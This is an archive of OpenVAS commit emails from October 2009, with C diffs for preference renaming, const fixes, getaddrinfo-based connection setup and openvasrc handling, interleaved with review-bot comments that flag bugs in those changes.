@@ -1,9 +1,14 @@ 2009-10-07 Matthew Mundell - * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Convert - NULL returns to ints. Use show_error instead of show_error_and_wait. - Add missing success return. Put the final g_free in an else. + * ChangeLog: Mark USE_OMP in last few logs. +2009-10-07 Matthew Mundell + + * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (create_omp_scope): + Convert NULL returns to ints. Use show_error instead of + show_error_and_wait. Add missing success return. Put the final g_free in + an else. + 2009-10-06 Jan-Oliver Wagner * openvas/prefs_dialog/prefs_scope_tree.c (scope_menu_save): Renamed @@ -11,19 +16,20 @@ 2009-10-06 Matthew Mundell - * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Symlink - NVT cache instead of copying it. Turn off saving of report NVT cache. + * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (create_omp_scope): + Symlink NVT cache instead of copying it. Turn off saving of report NVT + cache. - * openvas/context.c (context_new): Symlink NVT to parent cache instead of - saving cache to disk. + * openvas/context.c (context_new) [USE_OMP]: Symlink NVT to parent cache + instead of saving cache to disk. 2009-10-06 Matthew Mundell - * openvas/prefs_dialog/prefs_scope_tree.c (scopetree_refresh): Remove - verbose flag setting. Correct indentation. + * openvas/prefs_dialog/prefs_scope_tree.c (scopetree_refresh) [USE_OMP]: + Remove verbose flag setting. Correct indentation. - * openvas/openvas-client.c (refresh_server): Save context to disk - afterwards, so that new scopes can copy it. + * openvas/openvas-client.c [USE_OMP] (refresh_server): Save context to + disk afterwards, so that new scopes can copy it. 2009-10-02 Felix Wolfsteller From scm-commit at wald.intevation.org Wed Oct 7 12:49:45 2009 
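Review bot: the ChangeLog hunks of r5426 place the [USE_OMP] marker inconsistently: before the function list in "prefs_scope_tree.c [USE_OMP] (create_omp_scope)" and "openvas-client.c [USE_OMP] (refresh_server)", but after it in "context.c (context_new) [USE_OMP]" and "(scopetree_refresh) [USE_OMP]". Pick one position and use it for every marked entry so the log can be searched reliably.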
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 12:49:45 +0200 (CEST) Subject: [Openvas-commits] r5427 - in trunk/openvas-client: . openvas openvas/prefs_dialog Message-ID: <20091007104945.C8198851A581@pyrosoma.intevation.org> Author: jan Date: 2009-10-07 12:49:43 +0200 (Wed, 07 Oct 2009) New Revision: 5427 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/context.c trunk/openvas-client/openvas/openvas-client.c trunk/openvas-client/openvas/pdf_output.c trunk/openvas-client/openvas/preferences.c trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/context.c (context_collect, context_new, context_add, context_collect_servers), openvas/openvas-client.c (main), openvas/pdf_output.c (arglist_to_pdf), openvas/preferences.c (prefs_get_default), openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Renamed key "nessus_dir" to "openvas_dir". Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 10:37:26 UTC (rev 5426) +++ trunk/openvas-client/ChangeLog 2009-10-07 10:49:43 UTC (rev 5427) @@ -1,3 +1,12 @@ +2009-10-07 Jan-Oliver Wagner + + * openvas/context.c (context_collect, context_new, context_add, + context_collect_servers), openvas/openvas-client.c (main), + openvas/pdf_output.c (arglist_to_pdf), + openvas/preferences.c (prefs_get_default), + openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): + Renamed key "nessus_dir" to "openvas_dir". + 2009-10-07 Matthew Mundell * ChangeLog: Mark USE_OMP in last few logs. Modified: trunk/openvas-client/openvas/context.c =================================================================== --- trunk/openvas-client/openvas/context.c 2009-10-07 10:37:26 UTC (rev 5426) +++ trunk/openvas-client/openvas/context.c 2009-10-07 10:49:43 UTC (rev 5427) 
@@ -520,22 +520,22 @@ void context_collect (struct context *context) { - const char *dir = estrdup (prefs_get_string (context, "nessus_dir")); + const char *dir = estrdup (prefs_get_string (context, "openvas_dir")); context_collect_recurse (context, dir); } #ifdef USE_OMP /** - * @brief Recursively collects server contexts found in and under the nessus_dir. + * @brief Recursively collects server contexts found in and under the openvas_dir. * - * @param context Is queried for the nessus_dir preference, found server + * @param context Is queried for the openvas_dir preference, found server * contexts are added to it under .Servers. */ void context_collect_servers (struct context *context) { /** @todo use glibs path building functions (instead of strcat) */ - const char *dir = prefs_get_string (context, "nessus_dir"); + const char *dir = prefs_get_string (context, "openvas_dir"); char *sdir = emalloc (strlen (dir) + strlen ("/.Servers") + 1); strcpy (sdir, dir); @@ -760,7 +760,7 @@ if (parent->dir) dir = parent->dir; else - dir = prefs_get_string (parent, "nessus_dir"); + dir = prefs_get_string (parent, "openvas_dir"); if(!check_is_dir(dir) && (mkdir(dir, 0700) < 0)) { @@ -924,7 +924,7 @@ if(parent->dir) dir = parent->dir; else - dir = prefs_get_string(parent, "nessus_dir"); + dir = prefs_get_string(parent, "openvas_dir"); if(!check_is_dir(dir) && (mkdir(dir, 0700) < 0)) { Modified: trunk/openvas-client/openvas/openvas-client.c =================================================================== --- trunk/openvas-client/openvas/openvas-client.c 2009-10-07 10:37:26 UTC (rev 5426) +++ trunk/openvas-client/openvas/openvas-client.c 2009-10-07 10:49:43 UTC (rev 5427) 
@@ -1458,7 +1458,7 @@ #ifdef USE_OMP if(!quiet_mode) { - const char *dir = prefs_get_string (Global, "nessus_dir"); + const char *dir = prefs_get_string (Global, "openvas_dir"); gchar *servers_dir = g_build_filename (dir, "/.Servers", NULL); if (g_mkdir_with_parents (servers_dir, 0700)) Modified: trunk/openvas-client/openvas/pdf_output.c =================================================================== --- trunk/openvas-client/openvas/pdf_output.c 2009-10-07 10:37:26 UTC (rev 5426) +++ trunk/openvas-client/openvas/pdf_output.c 2009-10-07 10:49:43 UTC (rev 5427) @@ -265,7 +265,7 @@ NULL, "bin\\htmldoc.exe"); #endif /* CYGWIN */ - const char *openvas_dir = estrdup (prefs_get_string(Global, "nessus_dir")); + const char *openvas_dir = estrdup (prefs_get_string(Global, "openvas_dir")); snprintf(tmpfname, PATH_MAX, "%s/.openvas_%d_pdf", openvas_dir, getpid()); Modified: trunk/openvas-client/openvas/preferences.c =================================================================== --- trunk/openvas-client/openvas/preferences.c 2009-10-07 10:37:26 UTC (rev 5426) +++ trunk/openvas-client/openvas/preferences.c 2009-10-07 10:49:43 UTC (rev 5427) @@ -659,7 +659,7 @@ return (void *)OPENVAS_IANA_OTP_PORT; else if (!strcmp(name, "ssl_version")) return SSL_VER_DEF_NAME; - else if (!strcmp(name, "nessus_dir")) + else if (!strcmp(name, "openvas_dir")) { static char *openvas_dir; if (!openvas_dir) Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-07 10:37:26 UTC (rev 5426) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-07 10:49:43 UTC (rev 5427) 
@@ -940,7 +940,7 @@ gchar* file_name; gboolean ok; - servers_dir_name = g_build_filename (prefs_get_string (context, "nessus_dir"), + servers_dir_name = g_build_filename (prefs_get_string (context, "openvas_dir"), ".Servers", NULL); if (check_is_dir (servers_dir_name)) From scm-commit at wald.intevation.org Wed Oct 7 12:57:01 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 12:57:01 +0200 (CEST) Subject: [Openvas-commits] r5428 - in trunk/openvas-client: . openvas Message-ID: <20091007105701.65FCE861EAAA@pyrosoma.intevation.org> Author: jan Date: 2009-10-07 12:56:59 +0200 (Wed, 07 Oct 2009) New Revision: 5428 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/openvas-client.c trunk/openvas-client/openvas/openvas-client.h Log: * openvas/openvas-client.c (connect_to_scanner): Changed return value to be const. * openvas/openvas-client.c: Updated proto accordingly. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 10:49:43 UTC (rev 5427) +++ trunk/openvas-client/ChangeLog 2009-10-07 10:56:59 UTC (rev 5428) @@ -1,5 +1,12 @@ 2009-10-07 Jan-Oliver Wagner + * openvas/openvas-client.c (connect_to_scanner): Changed + return value to be const. + + * openvas/openvas-client.c: Updated proto accordingly. + +2009-10-07 Jan-Oliver Wagner + * openvas/context.c (context_collect, context_new, context_add, context_collect_servers), openvas/openvas-client.c (main), openvas/pdf_output.c (arglist_to_pdf), Modified: trunk/openvas-client/openvas/openvas-client.c =================================================================== --- trunk/openvas-client/openvas/openvas-client.c 2009-10-07 10:49:43 UTC (rev 5427) +++ trunk/openvas-client/openvas/openvas-client.c 2009-10-07 10:56:59 UTC (rev 5428) 
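Review bot: in openvas/context.c (r5427), hunk @@ -520,22 +520,22 @@, context_collect assigns estrdup (prefs_get_string (context, "openvas_dir")) to const char *dir, passes it to context_collect_recurse and returns without releasing it, so unless context_collect_recurse takes ownership the copy leaks on every call; context_collect_servers in the same hunk uses the preference string directly without a copy. Since the line is being touched anyway, drop the estrdup or free the copy after the call, and check whether the same estrdup-into-const pattern on the changed line in pdf_output.c is released later. The Servers path is also built two ways in the lines shown here: g_build_filename (dir, "/.Servers", NULL) in openvas-client.c and g_build_filename (..., ".Servers", NULL) in prefs_scope_tree.c; use the form without the leading slash in both.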
@@ -684,8 +684,7 @@ * * @return NULL in case of success, error message text otherwise. */ -// FIX const? -char * +const char * connect_to_scanner (struct context * context) { const char * hostname; Modified: trunk/openvas-client/openvas/openvas-client.h =================================================================== --- trunk/openvas-client/openvas/openvas-client.h 2009-10-07 10:49:43 UTC (rev 5427) +++ trunk/openvas-client/openvas/openvas-client.h 2009-10-07 10:56:59 UTC (rev 5428) @@ -32,8 +32,7 @@ #include "context.h" -// FIX const? -char * connect_to_scanner(struct context *); +const char * connect_to_scanner(struct context *); #ifdef USE_OMP const char * refresh_server (struct context *); #endif From scm-commit at wald.intevation.org Wed Oct 7 15:24:11 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 15:24:11 +0200 (CEST) Subject: [Openvas-commits] r5429 - in trunk/openvas-libraries: . misc Message-ID: <20091007132411.699EF80CF8D2@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 15:24:10 +0200 (Wed, 07 Oct 2009) New Revision: 5429 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/misc/openvas_server.c Log: * misc/openvas_server.c (openvas_server_open): Create address with getaddrinfo. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-07 10:56:59 UTC (rev 5428) +++ trunk/openvas-libraries/ChangeLog 2009-10-07 13:24:10 UTC (rev 5429) 
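Review bot: the ChangeLog hunk of r5428 names openvas/openvas-client.c twice, but the prototype change is in openvas/openvas-client.h according to the Modified list and the second file diff. Change the second entry to "* openvas/openvas-client.h: Updated proto accordingly." so the log matches the files touched.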
@@ -1,3 +1,8 @@ +2009-10-07 Matthew Mundell + + * misc/openvas_server.c (openvas_server_open): Create address with + getaddrinfo. + 2009-10-06 Tim Brown * misc/network.c, misc/openvas_auth.c, nasl/nasl_scanner_glue.c Modified: trunk/openvas-libraries/misc/openvas_server.c =================================================================== --- trunk/openvas-libraries/misc/openvas_server.c 2009-10-07 10:56:59 UTC (rev 5428) +++ trunk/openvas-libraries/misc/openvas_server.c 2009-10-07 13:24:10 UTC (rev 5429) @@ -38,7 +38,10 @@ #include #include #include +#include #include +#include +#include #include #include "openvas_server.h" @@ -72,8 +75,13 @@ openvas_server_open (gnutls_session_t * session, const char *host, int port) { + int server_socket; + struct addrinfo address_hints; + struct addrinfo *addresses, *address; + gchar *port_string; + /** @todo Ensure that host and port have sane values. */ - /** @todo Improve logging.*/ + /** @todo Improve logging. */ /* Turn off use of /dev/random, as this can block. */ 
@@ -88,54 +96,31 @@ return -1; } - /* Setup address. */ - - address.sin_family = AF_INET; - - address.sin_port = htons (port); - - if (!inet_aton (host, &address.sin_addr)) - { - g_message ("Failed to create server address %s.", - host); - return -1; - } - - g_message (" Set to connect to address %s port %i", - host, - ntohs (address.sin_port)); - - /* Make server socket. */ - - int server_socket = socket (PF_INET, SOCK_STREAM, 0); - if (server_socket == -1) - { - g_message ("Failed to create server socket"); - return -1; - } - /* Setup server session. */ - /** @todo Use openvas_server_session_new. */ + /** @todo Use openvas_server_new. */ gnutls_certificate_credentials_t credentials; if (gnutls_certificate_allocate_credentials (&credentials)) { g_message ("Failed to allocate server credentials."); - goto close_fail; + return -1; } // FIX always a client? if (gnutls_init (session, GNUTLS_CLIENT)) { g_message ("Failed to initialise server session."); - goto server_free_fail; + gnutls_certificate_free_credentials (credentials); + return -1; } if (gnutls_set_default_priority (*session)) { g_message ("Failed to set server session priority."); - goto server_fail; + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); + return -1; } const int kx_priority[] = { GNUTLS_KX_DHE_RSA, @@ -145,7 +130,9 @@ if (gnutls_kx_set_priority (*session, kx_priority)) { g_message ("Failed to set server key exchange priority."); - goto server_fail; + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); + return -1; } if (gnutls_credentials_set (*session, 
@@ -153,19 +140,71 @@ credentials)) { g_message ("Failed to set server credentials."); - goto server_fail; + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); + return -1; } - /** @todo Use openvas_server_connect. */ + /* Create the port string. */ - /* Connect to server. */ + port_string = g_strdup_printf ("%i", port); - if (connect (server_socket, - (struct sockaddr *) &address, - sizeof (struct sockaddr_in)) - == -1) + /* Get all possible addresses. */ + + memset (&address_hints, 0, sizeof (address_hints)); + address_hints.ai_family = AF_UNSPEC; /* IPv4 or IPv6. */ + address_hints.ai_socktype = SOCK_STREAM; + address_hints.ai_flags = AI_NUMERICSERV; + address_hints.ai_protocol = 0; + + if (getaddrinfo (host, port_string, &address_hints, &addresses)) { + g_free (port_string); + g_message ("Failed to get server addresses for %s: %s", + host, + gai_strerror (errno)); + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); + return -1; + } + g_free (port_string); + + /* Try to connect to each address in turn. */ + + for (address = addresses; address; address = address->ai_next) + { + /* Make server socket. */ + + server_socket = socket (PF_INET, SOCK_STREAM, 0); + if (server_socket == -1) + { + g_message ("Failed to create server socket"); + freeaddrinfo (addresses); + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); + return -1; + } + + /** @todo Use openvas_server_connect. */ + + /* Connect to server. */ + + if (connect (server_socket, address->ai_addr, address->ai_addrlen) + == -1) + { + close (server_socket); + continue; + } + break; + } + + freeaddrinfo (addresses); + + if (address == NULL) + { g_message ("Failed to connect to server"); + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); return -1; } 
@@ -187,22 +226,14 @@ gnutls_perror (ret); if (shutdown (server_socket, SHUT_RDWR) == -1) g_message ("Failed to shutdown server socket"); - goto server_fail; + close (server_socket); + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); + return -1; } g_message (" Shook hands with server."); return server_socket; - - server_fail: - gnutls_deinit (*session); - - server_free_fail: - gnutls_certificate_free_credentials (credentials); - - close_fail: - close (server_socket); - - return -1; } /** From scm-commit at wald.intevation.org Wed Oct 7 15:42:46 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 15:42:46 +0200 (CEST) Subject: [Openvas-commits] r5430 - trunk/openvas-plugins Message-ID: <20091007134246.38C97861EAD7@pyrosoma.intevation.org> Author: chandra Date: 2009-10-07 15:42:46 +0200 (Wed, 07 Oct 2009) New Revision: 5430 Modified: trunk/openvas-plugins/cve_current.txt Log: Updated cve current Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-07 13:24:10 UTC (rev 5429) +++ trunk/openvas-plugins/cve_current.txt 2009-10-07 13:42:46 UTC (rev 5430) @@ -111,4 +111,5 @@ CVE-2009-3484 SecPod 36543 Greenbone svn R 36391 Greenbone svn R +CVE-2009-3545 SecPod From scm-commit at wald.intevation.org Wed Oct 7 15:52:36 2009 
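Review bot: in misc/openvas_server.c (r5429), hunk @@ -153,19 +140,71 @@ of openvas_server_open, the connect loop still calls socket (PF_INET, SOCK_STREAM, 0) although the hints request AF_UNSPEC, so any IPv6 result from getaddrinfo is handed to an IPv4 socket and connect fails for it. Create the socket from the entry being tried, socket (address->ai_family, address->ai_socktype, address->ai_protocol), and on a socket failure continue to the next address instead of returning. In the same hunk the getaddrinfo failure is reported with gai_strerror (errno); getaddrinfo reports its error through its return value, so store that value and pass it to gai_strerror. The test "if (address == NULL)" also runs after freeaddrinfo (addresses) has released the list that address points into; record success in a flag, or test before the free, so the check does not inspect a pointer whose target has already been freed.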
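Review bot: in misc/openvas_server.c (r5429), hunk @@ -187,22 +226,14 @@, removing the server_fail, server_free_fail and close_fail labels means the gnutls_deinit / gnutls_certificate_free_credentials pair is now written out on every error return in openvas_server_open, which makes it easy for a later error path to miss one of them. Consider keeping a single cleanup label at the end of the function, with server_socket initialised to -1 and closed there only when it is valid, so each failure path is one goto.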
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 15:52:36 +0200 (CEST) Subject: [Openvas-commits] r5431 - in trunk/openvas-client: . openvas Message-ID: <20091007135236.2B5B5861EAB4@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 15:52:30 +0200 (Wed, 07 Oct 2009) New Revision: 5431 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/context.c Log: * openvas/context.c (context_new, context_add) [DISABLE_OMP]: Name new scopes "unnamed task". Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 13:42:46 UTC (rev 5430) +++ trunk/openvas-client/ChangeLog 2009-10-07 13:52:30 UTC (rev 5431) @@ -1,3 +1,8 @@ +2009-10-07 Matthew Mundell + + * openvas/context.c (context_new, context_add) [DISABLE_OMP]: Name new + scopes "unnamed task". + 2009-10-07 Jan-Oliver Wagner * openvas/openvas-client.c (connect_to_scanner): Changed @@ -12,7 +17,7 @@ openvas/pdf_output.c (arglist_to_pdf), openvas/preferences.c (prefs_get_default), openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): - Renamed key "nessus_dir" to "openvas_dir". + Renamed key "nessus_dir" to "openvas_dir". 2009-10-07 Matthew Mundell Modified: trunk/openvas-client/openvas/context.c =================================================================== --- trunk/openvas-client/openvas/context.c 2009-10-07 13:42:46 UTC (rev 5430) +++ trunk/openvas-client/openvas/context.c 2009-10-07 13:52:30 UTC (rev 5431) @@ -826,7 +826,11 @@ name = _("unnamed task"); break; case CONTEXT_SCOPE: +#ifndef DISABLE_OTP name = _("unnamed scope"); +#else + name = _("unnamed task"); +#endif break; default: show_error(_("context_new(): No name provided for context")); 
@@ -1027,7 +1031,11 @@ name = _("unnamed task"); break; case CONTEXT_SCOPE: +#ifndef DISABLE_OTP name = _("unnamed scope"); +#else + name = _("unnamed task"); +#endif break; default: show_error(_("context_new(): No name provided for context")); From scm-commit at wald.intevation.org Wed Oct 7 15:57:35 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 15:57:35 +0200 (CEST) Subject: [Openvas-commits] r5432 - in trunk/openvas-client: . openvas Message-ID: <20091007135735.974799503ABF@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 15:57:34 +0200 (Wed, 07 Oct 2009) New Revision: 5432 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/cli.c Log: * openvas/cli.c: Flush trailing whitespace. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 13:52:30 UTC (rev 5431) +++ trunk/openvas-client/ChangeLog 2009-10-07 13:57:34 UTC (rev 5432) @@ -1,5 +1,9 @@ 2009-10-07 Matthew Mundell + * openvas/cli.c: Flush trailing whitespace. + +2009-10-07 Matthew Mundell + * openvas/context.c (context_new, context_add) [DISABLE_OMP]: Name new scopes "unnamed task". Modified: trunk/openvas-client/openvas/cli.c =================================================================== --- trunk/openvas-client/openvas/cli.c 2009-10-07 13:52:30 UTC (rev 5431) +++ trunk/openvas-client/openvas/cli.c 2009-10-07 13:57:34 UTC (rev 5432) @@ -15,8 +15,8 @@ * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. * * cli.c - Command Line Interface manager - * - * modified by Axel Nennker 20020418 + * + * modified by Axel Nennker 20020418 * do not need gtk here * removed gcc -Wall complaints, NULL pointer checks */ 
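Review bot: in openvas/context.c (r5431), both hunks guard the new name with "#ifndef DISABLE_OTP", while the log message and the ChangeLog entry say [DISABLE_OMP]; one of the two is wrong, so either correct the ChangeLog condition to DISABLE_OTP or change the preprocessor test. The identical five-line #ifndef block is added at @@ -826,7 +826,11 @@ and again at @@ -1027,7 +1031,11 @@; a small helper returning the default scope name would keep the two copies from drifting. The ChangeLog hunk also re-indents the existing 'Renamed key "nessus_dir" to "openvas_dir".' line, an unrelated whitespace change that is better left out of this commit.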
@@ -95,11 +95,11 @@ signal(SIGTERM, cli_sigterm); g_cli = cli; - cli->backend = backend; + cli->backend = backend; while(!finished) { - /* I don't think buf[0] == 0 is a case that will happen, but just + /* I don't think buf[0] == 0 is a case that will happen, but just * to be safe, as it was the previous semantics */ if(network_gets(Context->socket, buf, sizeof(buf) - 1) < 0 || buf[0] == '\0') @@ -200,7 +200,7 @@ } -void +void cli_args_target (struct cli_args * args, char * target) { if (args->target) @@ -230,7 +230,7 @@ ftype = "nbe"; } } - else + else ftype++; args->extension = strdup(ftype); @@ -260,7 +260,7 @@ * @see arglist_to_latex * @see arglist_to_html * @see arglist_to_html_graph - * @see arglist_to_text + * @see arglist_to_text */ void cli_args_output (struct cli_args * args, char * type) @@ -429,11 +429,11 @@ printf("'%s', ", m); efree(&m); - m = sql_addslashes(p->family); + m = sql_addslashes(p->family); printf("'%s', ", m); efree(&m); - m = sql_addslashes(p->category); + m = sql_addslashes(p->category); printf("'%s', ", m); efree(&m); @@ -614,7 +614,7 @@ printf("%s = %s\n", p->name, (char*)p->value); break; } - p = p->next; + p = p->next; } if(Context->plugins)_cli_dump_pprefs(Context->plugins); From scm-commit at wald.intevation.org Wed Oct 7 16:00:28 2009 
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 16:00:28 +0200 (CEST) Subject: [Openvas-commits] r5433 - in trunk/openvas-client: . openvas openvas/prefs_dialog Message-ID: <20091007140028.479C9851A581@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 16:00:26 +0200 (Wed, 07 Oct 2009) New Revision: 5433 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/cli.c trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c Log: * openvas/prefs_dialog/prefs_dialog_auth.c (prefs_dialog_auth_do_connect): Add const to return and err. (prefs_dialog_auth_connect_dialog): Add const to err. * openvas/cli.c (cli_connect_to_scanner): Add const to err. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 13:57:34 UTC (rev 5432) +++ trunk/openvas-client/ChangeLog 2009-10-07 14:00:26 UTC (rev 5433) @@ -1,5 +1,13 @@ 2009-10-07 Matthew Mundell + * openvas/prefs_dialog/prefs_dialog_auth.c (prefs_dialog_auth_do_connect): + Add const to return and err. + (prefs_dialog_auth_connect_dialog): Add const to err. + + * openvas/cli.c (cli_connect_to_scanner): Add const to err. + +2009-10-07 Matthew Mundell + * openvas/cli.c: Flush trailing whitespace. 2009-10-07 Matthew Mundell Modified: trunk/openvas-client/openvas/cli.c =================================================================== --- trunk/openvas-client/openvas/cli.c 2009-10-07 13:57:34 UTC (rev 5432) +++ trunk/openvas-client/openvas/cli.c 2009-10-07 14:00:26 UTC (rev 5433) 
@@ -314,7 +314,7 @@ int cli_connect_to_scanner (struct cli_args * cli) { - char * err; + const char * err; prefs_set_string(Context, "nessusd_host", cli->server); prefs_set_int(Context, "nessusd_port", cli->port); prefs_set_string(Context, "nessusd_user", cli->login); Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c 2009-10-07 13:57:34 UTC (rev 5432) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c 2009-10-07 14:00:26 UTC (rev 5433) @@ -189,7 +189,7 @@ } -char * +const char * prefs_dialog_auth_do_connect (struct context *context, gpointer ctrls) { void *context_window = arg_get_value(MainDialog, "CONTEXT"); @@ -199,7 +199,7 @@ GtkWidget *vbox; GtkWidget *label; gchar *text; - char *err; + const char *err; int i; if(context_window) @@ -532,7 +532,7 @@ int port; const char *username; const char *password; - char *err; + const char *err; const char *trusted_ca; const char *cert_file; const char *key_file; From scm-commit at wald.intevation.org Wed Oct 7 17:28:01 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 17:28:01 +0200 (CEST) Subject: [Openvas-commits] r5434 - in trunk/openvas-client: . openvas/prefs_dialog Message-ID: <20091007152801.9AF95865F49C@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 17:28:00 +0200 (Wed, 07 Oct 2009) New Revision: 5434 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (create_omp_scope): Ensure RC contains correct name. Free strings used to set ID in RC. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 14:00:26 UTC (rev 5433) +++ trunk/openvas-client/ChangeLog 2009-10-07 15:28:00 UTC (rev 5434) 
@@ -1,5 +1,10 @@ 2009-10-07 Matthew Mundell + * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (create_omp_scope): + Ensure RC contains correct name. Free strings used to set ID in RC. + +2009-10-07 Matthew Mundell + * openvas/prefs_dialog/prefs_dialog_auth.c (prefs_dialog_auth_do_connect): Add const to return and err. (prefs_dialog_auth_connect_dialog): Add const to err. Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-07 14:00:26 UTC (rev 5433) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-07 15:28:00 UTC (rev 5434) 
@@ -983,8 +983,62 @@ return -3; } - // FIX ensure name is set in openvasrc? + /* Hack to ensure name in openvasrc. */ + pref = rc_preference (rcfile, "name"); + if (pref && (strcmp (pref, name) == 0)) + g_free (pref); + else + { + char *pos; + gchar *rc; + gsize rc_len; + GString *string; + GError *error; + + error = NULL; + g_file_get_contents (file_name, &rc, &rc_len, &error); + if (error) + { + show_error (_("%s: g_file_get_contents"), __FUNCTION__); + // FIX note error + g_error_free (error); + g_free (file_name); + return -4; + } + + pos = strchr (rc, '\n'); + if (pos) + { + *pos = '\0'; + string = g_string_new (rc); + /* The first \n ensures that "name" begins a line. */ + g_string_append_printf (string, "\nname = %s\n", name); + g_string_append (string, pos + 1); + } + else + { + string = g_string_new (rc); + /* The first \n ensures that "name" begins a line. */ + g_string_append_printf (string, "\nname = %s\n", name); + } + + g_free (rc); + rc = g_string_free (string, FALSE); + + error = NULL; + g_file_set_contents (file_name, (gchar*) rc, strlen (rc), &error); + g_free (rc); + if (error) + { + show_error (_("%s: g_file_get_contents"), __FUNCTION__); + // FIX note error + g_error_free (error); + g_free (file_name); + return -5; + } + } + /* Hack to ensure ID in openvasrc. */ pref = rc_preference (rcfile, "id"); @@ -993,7 +1047,7 @@ else { char *pos; - gchar *rc, *rc2; + gchar *rc; gsize rc_len; GString *string; GError *error; @@ -1025,10 +1079,12 @@ g_string_append_printf (string, "\nid = %s\n", id); } - rc2 = g_string_free (string, FALSE); + g_free (rc); + rc = g_string_free (string, FALSE); error = NULL; - g_file_set_contents (file_name, (gchar*) rc2, strlen (rc2), &error); + g_file_set_contents (file_name, (gchar*) rc, strlen (rc), &error); + g_free (rc); if (error) { show_error (_("%s: g_file_get_contents"), __FUNCTION__); From scm-commit at wald.intevation.org Wed Oct 7 17:35:56 2009 
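Review bot: In the new name block of create_omp_scope (@@ -983,8 +983,62 @@), a pref that is non-NULL but differs from name is never freed before pref is reassigned for "id", and the else branch then inserts a second "name = ..." line after the first line of the file without removing the existing one, so the rc ends up with two name entries. Free pref on that path and replace the existing line instead of adding another. name is also written verbatim through "\nname = %s\n", so a name containing a line break would add further lines to openvasrc; strip or reject line breaks before writing. The failure path after g_file_set_contents reports "%s: g_file_get_contents", which names the wrong call, in both the name and the id block. The two blocks now differ only in the key, so a shared helper taking the key and value would remove the duplication.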
